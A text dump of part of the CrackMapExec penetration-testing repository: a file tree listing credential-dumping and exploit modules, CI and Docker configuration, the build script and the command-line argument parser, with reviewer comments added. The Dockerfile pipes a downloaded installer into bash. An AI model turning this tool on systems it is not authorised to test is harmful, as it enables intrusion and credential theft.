Repository: byt3bl33d3r/CrackMapExec
Branch: master
Commit: 3c3e412193cb
Files: 194
Total size: 2.9 MB
Directory structure:
gitextract_1_y4acn_/
├── .dockerignore
├── .github/
│ ├── ISSUE_TEMPLATE/
│ │ └── bug_report.md
│ └── workflows/
│ ├── crackmapexec-test.yml
│ └── crackmapexec.yml
├── .gitignore
├── .gitmodules
├── Dockerfile
├── LICENSE
├── Makefile
├── README.md
├── build_collector.py
├── cme/
│ ├── .hooks/
│ │ └── hook-lsassy.py
│ ├── __init__.py
│ ├── cli.py
│ ├── cmedb.py
│ ├── config.py
│ ├── connection.py
│ ├── console.py
│ ├── context.py
│ ├── crackmapexec.py
│ ├── data/
│ │ ├── cme.conf
│ │ ├── default.pem
│ │ ├── keepass_trigger_module/
│ │ │ ├── AddKeePassTrigger.ps1
│ │ │ ├── RemoveKeePassTrigger.ps1
│ │ │ └── RestartKeePass.ps1
│ │ ├── msol_dump/
│ │ │ └── msol_dump.ps1
│ │ ├── veeam_dump_module/
│ │ │ ├── veeam_dump_mssql.ps1
│ │ │ └── veeam_dump_postgresql.ps1
│ │ └── wmiexec_event_vbscripts/
│ │ ├── Exec_Command_Silent.vbs
│ │ └── Exec_Command_WithOutput.vbs
│ ├── first_run.py
│ ├── helpers/
│ │ ├── __init__.py
│ │ ├── bash.py
│ │ ├── bloodhound.py
│ │ ├── http.py
│ │ ├── logger.py
│ │ ├── misc.py
│ │ ├── msada_guids.py
│ │ └── powershell.py
│ ├── loaders/
│ │ ├── __init__.py
│ │ ├── moduleloader.py
│ │ └── protocolloader.py
│ ├── logger.py
│ ├── modules/
│ │ ├── IOXIDResolver.py
│ │ ├── MachineAccountQuota.py
│ │ ├── adcs.py
│ │ ├── add_computer.py
│ │ ├── appcmd.py
│ │ ├── bh_owned.py
│ │ ├── daclread.py
│ │ ├── dfscoerce.py
│ │ ├── drop-sc.py
│ │ ├── empire_exec.py
│ │ ├── enum_av.py
│ │ ├── enum_dns.py
│ │ ├── example_module.py
│ │ ├── find-computer.py
│ │ ├── firefox.py
│ │ ├── get-desc-users.py
│ │ ├── get_netconnections.py
│ │ ├── gpp_autologin.py
│ │ ├── gpp_password.py
│ │ ├── group_members.py
│ │ ├── groupmembership.py
│ │ ├── handlekatz.py
│ │ ├── hash_spider.py
│ │ ├── impersonate.py
│ │ ├── install_elevated.py
│ │ ├── keepass_discover.py
│ │ ├── keepass_trigger.py
│ │ ├── laps.py
│ │ ├── ldap-checker.py
│ │ ├── lsassy_dump.py
│ │ ├── masky.py
│ │ ├── met_inject.py
│ │ ├── ms17-010.py
│ │ ├── msol.py
│ │ ├── mssql_priv.py
│ │ ├── nanodump.py
│ │ ├── nopac.py
│ │ ├── ntdsutil.py
│ │ ├── ntlmv1.py
│ │ ├── petitpotam.py
│ │ ├── pi.py
│ │ ├── printnightmare.py
│ │ ├── procdump.py
│ │ ├── pso.py
│ │ ├── rdcman.py
│ │ ├── rdp.py
│ │ ├── reg-query.py
│ │ ├── runasppl.py
│ │ ├── scan-network.py
│ │ ├── scuffy.py
│ │ ├── shadowcoerce.py
│ │ ├── slinky.py
│ │ ├── spider_plus.py
│ │ ├── spooler.py
│ │ ├── subnets.py
│ │ ├── teams_localdb.py
│ │ ├── test_connection.py
│ │ ├── trust.py
│ │ ├── uac.py
│ │ ├── user_desc.py
│ │ ├── veeam_dump.py
│ │ ├── wcc.py
│ │ ├── wdigest.py
│ │ ├── web_delivery.py
│ │ ├── webdav.py
│ │ ├── whoami.py
│ │ ├── winscp_dump.py
│ │ ├── wireless.py
│ │ └── zerologon.py
│ ├── parsers/
│ │ ├── __init__.py
│ │ ├── ip.py
│ │ ├── nessus.py
│ │ └── nmap.py
│ ├── paths.py
│ ├── protocols/
│ │ ├── __init__.py
│ │ ├── ftp/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── ftp.py
│ │ ├── ldap/
│ │ │ ├── __init__.py
│ │ │ ├── bloodhound.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── gmsa.py
│ │ │ ├── kerberos.py
│ │ │ ├── laps.py
│ │ │ └── proto_args.py
│ │ ├── ldap.py
│ │ ├── mssql/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── mssqlexec.py
│ │ │ └── proto_args.py
│ │ ├── mssql.py
│ │ ├── rdp/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── rdp.py
│ │ ├── smb/
│ │ │ ├── __init__.py
│ │ │ ├── atexec.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── firefox.py
│ │ │ ├── mmcexec.py
│ │ │ ├── passpol.py
│ │ │ ├── proto_args.py
│ │ │ ├── remotefile.py
│ │ │ ├── samrfunc.py
│ │ │ ├── samruser.py
│ │ │ ├── smbexec.py
│ │ │ ├── smbspider.py
│ │ │ └── wmiexec.py
│ │ ├── smb.py
│ │ ├── ssh/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── ssh.py
│ │ ├── vnc/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── vnc.py
│ │ ├── winrm/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── winrm.py
│ │ ├── wmi/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── proto_args.py
│ │ │ ├── wmiexec.py
│ │ │ └── wmiexec_event.py
│ │ └── wmi.py
│ └── servers/
│ ├── __init__.py
│ ├── http.py
│ └── smb.py
├── crackmapexec.spec
├── flake.nix
├── pyproject.toml
├── shell.nix
└── tests/
├── README.md
├── data/
│ ├── test_key.priv
│ ├── test_passwords.txt
│ └── test_users.txt
├── e2e_commands.txt
├── e2e_test.py
└── test_smb_database.py
================================================
FILE CONTENTS
================================================
================================================
FILE: .dockerignore
================================================
tests
Dockerfile
*.pyc
*.pyo
*.pyd
__pycache__
.vscode
.venv
.github
build
bin
dist
*.egg-info
cme/data/powersploit/Recon/Dictionaries
cme/data/powersploit/Exfiltration/NTFSParser
cme/data/powersploit/CodeExecution/Invoke-ReflectivePEInjection_Resources
cme/data/powersploit/Exfiltration/LogonUser
cme/data/powersploit/Tests
cme/data/netripper/DLL
cme/data/netripper/Metasploit
cme/data/netripper/NetRipper
cme/data/netripper/Win32
cme/data/netripper/Release
cme/data/netripper/minhook
cme/data/netripper/x64
cme/data/netripper/*.pdf
cme/data/netripper/*.sln
cme/data/invoke-vnc/winvnc
cme/data/invoke-vnc/vncdll
cme/data/invoke-vnc/pebytes.ps1
cme/data/invoke-vnc/ReflectiveDLLInjection
cme/data/invoke-vnc/*.py
cme/data/invoke-vnc/*.bat
cme/data/invoke-vnc/*.msbuild
cme/data/invoke-vnc/*.sln
cme/data/RID-Hijacking/modules
cme/data/RID-Hijacking/slides
================================================
FILE: .github/ISSUE_TEMPLATE/bug_report.md
================================================
---
name: Bug report
about: Create a report to help us improve
title: ''
labels: ''
assignees: ''
---
**Describe the bug**
A clear and concise description of what the bug is.
**To Reproduce**
Steps to reproduce the behavior i.e.:
Command: `crackmapexec smb -u username -p password`
Resulted in:
```
crackmapexec smb 10.10.10.10 -u username -p password -x "whoami"
SMB 10.10.10.10 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:domain) (signing:True) (SMBv1:False)
SMB 10.10.10.10 445 DC01 [+] domain\username:password
Traceback (most recent call last):
...
```
**Expected behavior**
A clear and concise description of what you expected to happen.
**Screenshots**
If applicable, add screenshots to help explain your problem.
**Crackmapexec info**
- OS: [e.g. Kali]
- Version of CME [e.g. v5.0.2]
- Installed from: apt/github/pip/docker/...? Please try with the latest release before opening an issue
**Additional context**
Add any other context about the problem here.
================================================
FILE: .github/workflows/crackmapexec-test.yml
================================================
# CI workflow: installs the project with Poetry and runs the pytest suite on
# pushes and pull requests targeting master, for each listed Python version.
# NOTE(review): no `permissions:` block is declared, so the job gets the
# repository's default GITHUB_TOKEN scopes; the steps below only check out and
# test code, so a read-only `contents: read` grant looks sufficient.
name: CrackMapExec Tests
on:
  workflow_dispatch:
  push:
    branches: [ master ]
  pull_request:
    branches: [ master ]
jobs:
  build:
    name: CrackMapExec Tests for Py${{ matrix.python-version }}
    runs-on: ${{ matrix.os }}
    strategy:
      max-parallel: 4
      matrix:
        os: [ubuntu-latest]
        python-version: ["3.7", "3.8", "3.9", "3.10", "3.11"]
    steps:
    # NOTE(review): actions are referenced by version tag; a tag can be moved,
    # pinning to a full commit SHA makes the reference immutable.
    - uses: actions/checkout@v3
    # Despite the step name, this step only installs the requested interpreter.
    - name: CrackMapExec tests on ${{ matrix.os }}
      uses: actions/setup-python@v4
      with:
        python-version: ${{ matrix.python-version }}
    # NOTE(review): Poetry is installed without a version constraint, so each
    # run uses whatever release is current at that time.
    - name: Install poetry
      run: |
        pipx install poetry --python python${{ matrix.python-version }}
        poetry --version
        poetry env info
    - name: Install librairies with dev group
      run: |
        poetry install --with dev
    # Runs everything under tests/ with pytest inside the Poetry environment.
    - name: Run the e2e test
      run: |
        poetry run pytest tests
================================================
FILE: .github/workflows/crackmapexec.yml
================================================
# CI workflow: builds the cme and cmedb zipapps with shiv on each OS / Python
# combination and uploads them as artifacts. No test step is run here.
# NOTE(review): every trigger filters on `main`, while crackmapexec-test.yml
# filters on `master`; confirm which one is the default branch, otherwise the
# push and pull_request triggers here never match.
# NOTE(review): no `permissions:` block is declared, so the job gets the
# repository's default GITHUB_TOKEN scopes.
name: CrackMapExec Tests & Build
on:
  # NOTE(review): `branches` is presumably not a supported key for
  # workflow_dispatch (it takes `inputs`); verify and drop it if so.
  workflow_dispatch:
    branches: [ main ]
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]
jobs:
  build:
    name: CrackMapExec Tests on ${{ matrix.os }}
    runs-on: ${{ matrix.os }}
    strategy:
      max-parallel: 4
      matrix:
        os: [ubuntu-latest, macOS-latest, windows-latest]
        python-version: ["3.8", "3.9", "3.10", "3.11"]
    steps:
    - uses: actions/checkout@v3
    # Despite the step name, this step only installs the requested interpreter.
    - name: CrackMapExec tests on ${{ matrix.os }}
      uses: actions/setup-python@v4
      with:
        python-version: ${{ matrix.python-version }}
    # NOTE(review): shiv is installed without a version constraint, so the
    # tool that produces the released binaries can change between runs.
    - name: Build binaries with Shiv
      run: |
        pip install shiv
        python build_collector.py
    # NOTE(review): `@master` tracks a mutable branch of the action, so the
    # code that handles the built binaries can change without any change in
    # this repository; pin to a release tag or, better, a full commit SHA.
    - name: Upload cme binary
      uses: actions/upload-artifact@master
      with:
        name: cme-${{ matrix.os }}-${{ matrix.python-version }}
        path: bin/cme
    # Same mutable `@master` reference as the step above.
    - name: Upload cmedb binary
      uses: actions/upload-artifact@master
      with:
        name: cmedb-${{ matrix.os }}-${{ matrix.python-version }}
        path: bin/cmedb
================================================
FILE: .gitignore
================================================
data/cme.db
*.bak
*.log
.venv
.vscode
.idea
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
bin/
# C extensions
*.so
# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
*.egg-info/
.installed.cfg
*.egg
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
!crackmapexec.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*,cover
# Translations
*.mo
*.pot
# Django stuff:
*.log
# Sphinx documentation
docs/_build/
# PyBuilder
target/
================================================
FILE: .gitmodules
================================================
================================================
FILE: Dockerfile
================================================
# Image that installs CrackMapExec from the build context with pip and uses
# `cme` as its entrypoint.
# NOTE(review): no USER instruction appears in this file, so the entrypoint
# runs as root inside the container.
# NOTE(review): the base image is referenced by a floating tag, not a digest,
# so rebuilds can pick up a different base.
FROM python:3.11-slim
ENV LANG=C.UTF-8
ENV LC_ALL=C.UTF-8
ENV PIP_NO_CACHE_DIR=off
WORKDIR /usr/src/crackmapexec
# Build dependencies for the Python packages compiled during `pip install`.
RUN apt-get update && \
    apt-get install -y libffi-dev libxml2-dev libxslt-dev libssl-dev openssl autoconf g++ python3-dev curl git
# NOTE(review): this second update is not followed by an install, so it only
# adds a layer holding package index files.
RUN apt-get update
# Get Rust
# NOTE(review): the installer script is downloaded and piped straight into
# bash with no checksum or signature check and no pinned toolchain version,
# so the build trusts whatever the URL serves at build time.
RUN curl https://sh.rustup.rs -sSf | bash -s -- -y
# Add .cargo/bin to PATH
ENV PATH="/root/.cargo/bin:${PATH}"
# Check cargo is visible
RUN cargo --help
# Copies the whole build context (minus .dockerignore entries) into the image.
COPY . .
RUN pip install .
ENTRYPOINT [ "cme" ]
================================================
FILE: LICENSE
================================================
Copyright (c) 2022, byt3bl33d3r, mpgn_x64
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================
FILE: Makefile
================================================
# Developer helper targets: clean build output, lint, export requirement files.
.PHONY: tests
# NOTE(review): `build` is the default goal but no `build` rule is visible in
# this file, so a bare `make` fails unless the rule is defined elsewhere.
default: build
# Remove build output directories and Python/pytest cache files.
clean:
	rm -f -r build/
	rm -f -r bin/
	rm -f -r dist/
	find . -name '*.pyc' -exec rm -f {} +
	find . -name '*.pyo' -exec rm -f {} +
	find . -name '*~' -exec rm -f {} +
	find . -name '__pycache__' -exec rm -rf {} +
	find . -name '.pytest_cache' -exec rm -rf {} +
# Lint with flake8, selecting only the E9, F63, F7 and F82 checks; cme/data is excluded.
tests:
	flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics --exclude cme/data/*
# Regenerate the pip requirement files from the Poetry project.
# NOTE(review): --without-hashes drops the per-package hashes, so pip cannot
# run in hash-checking mode against the exported files.
requirements:
	poetry export --without-hashes -f requirements.txt -o requirements.txt
	poetry export --without-hashes --dev -f requirements.txt -o requirements-dev.txt
================================================
FILE: README.md
================================================
# No Longer Maintained
This project is no longer maintained due to the existence of a hostile fork.
# CrackMapExec
<p align="center">
<img src="https://cloud.githubusercontent.com/assets/5151193/17577511/d312ceb4-5f3b-11e6-8de5-8822246289fd.jpg" alt="cme"/>
</p>
You are on the **latest up-to-date** repository of the project CrackMapExec ! 🎉
- 🚧 If you want to report a problem, open an [Issue](https://github.com/mpgn/CrackMapExec/issues)
- 🔀 If you want to contribute, open a [Pull Request](https://github.com/mpgn/CrackMapExec/pulls)
- 💬 If you want to discuss, open a [Discussion](https://github.com/mpgn/CrackMapExec/discussions)
# Acknowledgments
**(These are the people who did the hard stuff)**
This project was originally inspired by:
- [CredCrack](https://github.com/gojhonny/CredCrack)
- [smbexec](https://github.com/pentestgeek/smbexec)
- [smbmap](https://github.com/ShawnDEvans/smbmap)
Unintentional contributors:
- The [Empire](https://github.com/PowerShellEmpire/Empire) project
- @T-S-A's [smbspider](https://github.com/T-S-A/smbspider) script
- @ConsciousHacker's partial Python port of Invoke-obfuscation from the [GreatSCT](https://github.com/GreatSCT/GreatSCT) project
# Documentation, Tutorials, Examples
See the project's [wiki](https://www.crackmapexec.wiki/) for documentation and usage examples
# Installation
Please see the installation instructions on the [official wiki](https://www.crackmapexec.wiki/getting-started/installation)
# Code Contributors
Awesome code contributors of CME:
[](https://github.com/Marshall-Hallenbeck)
[](https://github.com/zblurx)
[](https://github.com/NeffIsBack)
[](https://github.com/Hackndo)
[](https://github.com/nurfed1)
# To do
- ~~0wn everything~~
================================================
FILE: build_collector.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import shutil
import subprocess
import sys
import time
from datetime import datetime
from pathlib import Path
from shiv.bootstrap import Environment
# from distutils.ccompiler import new_compiler
from shiv.builder import create_archive
from shiv.cli import __version__ as VERSION
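def build_cme():
    """Build the ``bin/cme`` zipapp with shiv.

    Recreates the ``build`` and ``bin`` directories, copies the ``cme``
    package into ``build``, pip-installs the project into ``build``, strips
    the ``*.dist-info`` directories and packs the result into ``bin/cme``.

    If the directories cannot be prepared the error is printed and the
    function returns without building. A failing ``pip install`` raises
    ``subprocess.CalledProcessError``.
    """
    print("building CME")

    # Remove each stale directory on its own. Previously both removals shared
    # one try block, so a missing "bin" skipped the removal of "build" and the
    # os.mkdir("build") below then failed, silently aborting the build.
    for stale_dir in ("bin", "build"):
        shutil.rmtree(stale_dir, ignore_errors=True)

    try:
        print("remove useless files")
        os.mkdir("build")
        os.mkdir("bin")
        shutil.copytree("cme", "build/cme")
    except OSError as e:
        print(e)
        return

    # Argument list (no shell) so nothing here is interpreted by a shell.
    subprocess.run(
        [
            sys.executable,
            "-m",
            "pip",
            "install",
            "-e",
            ".",
            "-t",
            "build",
        ],
        check=True,
    )

    # Package metadata directories are not wanted in the archive.
    for dist_info in Path("build").glob("**/*.dist-info"):
        shutil.rmtree(dist_info)

    env = Environment(
        built_at=datetime.utcfromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"),
        entry_point="cme.crackmapexec:main",
        script=None,
        compile_pyc=False,
        extend_pythonpath=True,
        shiv_version=VERSION,
    )
    create_archive(
        [Path("build").absolute()],
        Path("bin/cme"),
        "/usr/bin/env -S python -sE",
        "_bootstrap:bootstrap",
        env,
        True,
    )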
def build_cmedb():
    """Pack the ``build`` directory into the ``bin/cmedb`` zipapp with shiv.

    Reads the ``build`` directory as-is; it does not populate it, so it is
    expected to run after ``build_cme`` has prepared it.
    """
    print("building CMEDB")

    build_stamp = datetime.utcfromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S")
    shiv_env = Environment(
        built_at=build_stamp,
        entry_point="cme.cmedb:main",
        script=None,
        compile_pyc=False,
        extend_pythonpath=True,
        shiv_version=VERSION,
    )

    source_dirs = [Path("build").absolute()]
    output_file = Path("bin/cmedb")
    create_archive(
        source_dirs,
        output_file,
        "/usr/bin/env -S python -sE",
        "_bootstrap:bootstrap",
        shiv_env,
        True,
    )
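if __name__ == "__main__":
    # Build both archives, then always remove the scratch "build" directory.
    # Errors are no longer swallowed by a bare ``except: pass``: a failed build
    # now surfaces with a traceback and a non-zero exit status instead of
    # looking like a success to the caller (for example a CI job that goes on
    # to upload bin/cme and bin/cmedb).
    try:
        build_cme()
        build_cmedb()
    finally:
        # ignore_errors: "build" may not exist if the build stopped early,
        # and that must not mask the original error.
        shutil.rmtree("build", ignore_errors=True)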
================================================
FILE: cme/.hooks/hook-lsassy.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from PyInstaller.utils.hooks import collect_all
# PyInstaller hook for the "lsassy" package: collect_all() gathers its data
# files, binaries and hidden imports, which are exposed here under the
# module-level names a PyInstaller hook file is expected to define.
datas, binaries, hiddenimports = collect_all("lsassy")
================================================
FILE: cme/__init__.py
================================================
================================================
FILE: cme/cli.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import sys
from argparse import RawTextHelpFormatter
from cme.loaders.protocolloader import ProtocolLoader
from cme.helpers.logger import highlight
from termcolor import colored
from cme.logger import cme_logger
import importlib.metadata
def gen_cli_args():
    """Build the ``cme`` argument parser, parse ``sys.argv`` and return the result.

    Three parsers are assembled: the top-level ``parser`` (global options and
    the banner), ``module_parser`` (module selection and module server
    options) and ``std_parser`` (targets and credentials). The last two are
    handed to each protocol's ``proto_args`` so it can register its own
    sub-command.

    Returns:
        The ``argparse.Namespace`` produced by ``parser.parse_args()``.

    Exits the process with status 1 when no argument is given (after printing
    the help) and when ``--version`` is passed (after printing the version).
    """
    # Version comes from the installed package metadata, not from a constant.
    VERSION = importlib.metadata.version("crackmapexec")
    CODENAME = "John Wick"
    # The banner lines below are part of the f-string and must stay unindented.
    parser = argparse.ArgumentParser(description=f"""
______ .______ ___ ______ __ ___ .___ ___. ___ .______ _______ ___ ___ _______ ______
/ || _ \ / \ / || |/ / | \/ | / \ | _ \ | ____|\ \ / / | ____| / |
| ,----'| |_) | / ^ \ | ,----'| ' / | \ / | / ^ \ | |_) | | |__ \ V / | |__ | ,----'
| | | / / /_\ \ | | | < | |\/| | / /_\ \ | ___/ | __| > < | __| | |
| `----.| |\ \----. / _____ \ | `----.| . \ | | | | / _____ \ | | | |____ / . \ | |____ | `----.
\______|| _| `._____|/__/ \__\ \______||__|\__\ |__| |__| /__/ \__\ | _| |_______|/__/ \__\ |_______| \______|
A swiss army knife for pentesting networks
Forged by @byt3bl33d3r and @mpgn_x64 using the powah of dank memes
{highlight('Version', 'red')} : {highlight(VERSION)}
{highlight('Codename', 'red')}: {highlight(CODENAME)}
""",
        formatter_class=RawTextHelpFormatter,
    )
    parser.add_argument(
        "-t",
        type=int,
        dest="threads",
        default=100,
        help="set how many concurrent threads to use (default: 100)",
    )
    parser.add_argument(
        "--timeout",
        default=None,
        type=int,
        help="max timeout in seconds of each thread (default: None)",
    )
    parser.add_argument(
        "--jitter",
        metavar="INTERVAL",
        type=str,
        help="sets a random delay between each connection (default: None)",
    )
    parser.add_argument(
        "--no-progress",
        action="store_true",
        help="Not displaying progress bar during scan",
    )
    parser.add_argument("--verbose", action="store_true", help="enable verbose output")
    parser.add_argument("--debug", action="store_true", help="enable debug level information")
    parser.add_argument("--version", action="store_true", help="Display CME version")

    # we do module arg parsing here so we can reference the module_list attribute below
    module_parser = argparse.ArgumentParser(add_help=False)
    mgroup = module_parser.add_mutually_exclusive_group()
    mgroup.add_argument("-M", "--module", action="append", metavar="MODULE", help="module to use")
    module_parser.add_argument(
        "-o",
        metavar="MODULE_OPTION",
        nargs="+",
        default=[],
        dest="module_options",
        help="module options",
    )
    module_parser.add_argument("-L", "--list-modules", action="store_true", help="list available modules")
    module_parser.add_argument(
        "--options",
        dest="show_module_options",
        action="store_true",
        help="display module options",
    )
    module_parser.add_argument(
        "--server",
        choices={"http", "https"},
        default="https",
        help="use the selected server (default: https)",
    )
    # NOTE(review): the default bind address is every interface (0.0.0.0);
    # an operator who wants the module server reachable from one network only
    # has to pass --server-host explicitly.
    module_parser.add_argument(
        "--server-host",
        type=str,
        default="0.0.0.0",
        metavar="HOST",
        help="IP to bind the server to (default: 0.0.0.0)",
    )
    module_parser.add_argument(
        "--server-port",
        metavar="PORT",
        type=int,
        help="start the server on the specified port",
    )
    module_parser.add_argument(
        "--connectback-host",
        type=str,
        metavar="CHOST",
        help="IP for the remote system to connect back to (default: same as server-host)",
    )

    subparsers = parser.add_subparsers(title="protocols", dest="protocol", description="available protocols")

    std_parser = argparse.ArgumentParser(add_help=False)
    # The target becomes optional ("*") when -L or --options is present.
    # module_parser.parse_known_args() is evaluated twice here, each time
    # against sys.argv, only to read those two flags.
    std_parser.add_argument(
        "target",
        nargs="+" if not (module_parser.parse_known_args()[0].list_modules or module_parser.parse_known_args()[0].show_module_options) else "*",
        type=str,
        help="the target IP(s), range(s), CIDR(s), hostname(s), FQDN(s), file(s) containing a list of targets, NMap XML or .Nessus file(s)",
    )
    std_parser.add_argument(
        "-id",
        metavar="CRED_ID",
        nargs="+",
        default=[],
        type=str,
        dest="cred_id",
        help="database credential ID(s) to use for authentication",
    )
    std_parser.add_argument(
        "-u",
        metavar="USERNAME",
        dest="username",
        nargs="+",
        default=[],
        help="username(s) or file(s) containing usernames",
    )
    std_parser.add_argument(
        "-p",
        metavar="PASSWORD",
        dest="password",
        nargs="+",
        default=[],
        help="password(s) or file(s) containing passwords",
    )
    std_parser.add_argument("-k", "--kerberos", action="store_true", help="Use Kerberos authentication")
    std_parser.add_argument("--no-bruteforce", action="store_true", help="No spray when using file for username and password (user1 => password1, user2 => password2")
    std_parser.add_argument("--continue-on-success", action="store_true", help="continues authentication attempts even after successes")
    std_parser.add_argument(
        "--use-kcache",
        action="store_true",
        help="Use Kerberos authentication from ccache file (KRB5CCNAME)",
    )
    std_parser.add_argument("--log", metavar="LOG", help="Export result into a custom file")
    std_parser.add_argument(
        "--aesKey",
        metavar="AESKEY",
        nargs="+",
        help="AES key to use for Kerberos Authentication (128 or 256 bits)",
    )
    std_parser.add_argument(
        "--kdcHost",
        metavar="KDCHOST",
        help="FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter",
    )

    # Only one of the three failure limits can be given at a time.
    fail_group = std_parser.add_mutually_exclusive_group()
    fail_group.add_argument(
        "--gfail-limit",
        metavar="LIMIT",
        type=int,
        help="max number of global failed login attempts",
    )
    fail_group.add_argument(
        "--ufail-limit",
        metavar="LIMIT",
        type=int,
        help="max number of failed login attempts per username",
    )
    fail_group.add_argument(
        "--fail-limit",
        metavar="LIMIT",
        type=int,
        help="max number of failed login attempts per host",
    )

    # Each protocol registers its own sub-command through its proto_args file.
    p_loader = ProtocolLoader()
    protocols = p_loader.get_protocols()

    for protocol in protocols.keys():
        try:
            protocol_object = p_loader.load_protocol(protocols[protocol]["argspath"])
            subparsers = protocol_object.proto_args(subparsers, std_parser, module_parser)
        # NOTE(review): a bare except also catches KeyboardInterrupt and
        # SystemExit; the failure is logged and the loop moves on to the next
        # protocol, so a broken protocol is simply missing from the CLI.
        except:
            cme_logger.exception(f"Error loading proto_args from proto_args.py file in protocol folder: {protocol}")

    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    args = parser.parse_args()

    if args.version:
        print(f"{VERSION} - {CODENAME}")
        # NOTE(review): exit status is 1 although printing the version is not an error.
        sys.exit(1)

    return args
================================================
FILE: cme/cmedb.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import cmd
import configparser
import csv
import os
from os import listdir
from os.path import exists
from os.path import join as path_join
import shutil
from sqlite3 import connect
import sys
from textwrap import dedent
from requests import get, post, ConnectionError
from sqlalchemy import create_engine
from terminaltables import AsciiTable
from cme.loaders.protocolloader import ProtocolLoader
from cme.paths import CONFIG_PATH, WS_PATH, WORKSPACE_DIR
class UserExitedProto(Exception):
    """Raised by ``DatabaseNavigator.do_back`` when the user leaves a protocol menu."""
def create_db_engine(db_path):
    """Return a SQLAlchemy engine for the SQLite database file at ``db_path``.

    The engine is created with ``AUTOCOMMIT`` isolation and ``future=True``.
    """
    sqlite_url = f"sqlite:///{db_path}"
    return create_engine(sqlite_url, isolation_level="AUTOCOMMIT", future=True)
def print_table(data, title=None):
    """Print ``data`` as an ASCII table with a blank line before and after.

    Args:
        data: rows handed to ``AsciiTable``.
        title: optional table title; ignored when falsy.
    """
    print("")
    rendered = AsciiTable(data)
    if title:
        rendered.title = title
    # Table line followed by one empty line.
    print(rendered.table, end="\n\n")
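def write_csv(filename, headers, entries):
    """Write ``headers`` and ``entries`` to ``filename`` as a CSV file.

    Fields are separated by ``;``, every field is quoted and rows end with
    ``\\n``.

    Args:
        filename: output path; a leading ``~`` is expanded.
        headers: sequence of column names, written as the first row.
        entries: iterable of rows.
    """
    path = os.path.expanduser(filename)
    # The callers in this file export credentials and DPAPI secrets through
    # this function, so a new file is created owner-only (0600) instead of
    # with the default mode. An already existing file keeps its current mode.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    # newline="" lets the csv writer control line endings itself, and an
    # explicit encoding avoids depending on the locale for non-ASCII names.
    with open(fd, "w", newline="", encoding="utf-8") as export_file:
        # NOTE(review): values are written as stored; if the export is opened
        # in a spreadsheet, cells starting with =, +, - or @ may be treated as
        # formulas. Some of the exported fields (e.g. share remarks) are
        # presumably collected from remote hosts - confirm and neutralise at
        # the consumer or here if that matters for your workflow.
        csv_file = csv.writer(
            export_file,
            delimiter=";",
            quoting=csv.QUOTE_ALL,
            lineterminator="\n",
            escapechar="\\",
        )
        csv_file.writerow(headers)
        csv_file.writerows(entries)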
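def write_list(filename, entries):
    """Write each string in ``entries`` to ``filename``, one per line.

    Args:
        filename: output path; a leading ``~`` is expanded.
        entries: iterable of strings.
    """
    path = os.path.expanduser(filename)
    # The callers in this file export hash lists and keys through this
    # function, so a new file is created owner-only (0600) instead of with the
    # default mode. An already existing file keeps its current mode.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    # Explicit encoding so non-ASCII names do not depend on the locale.
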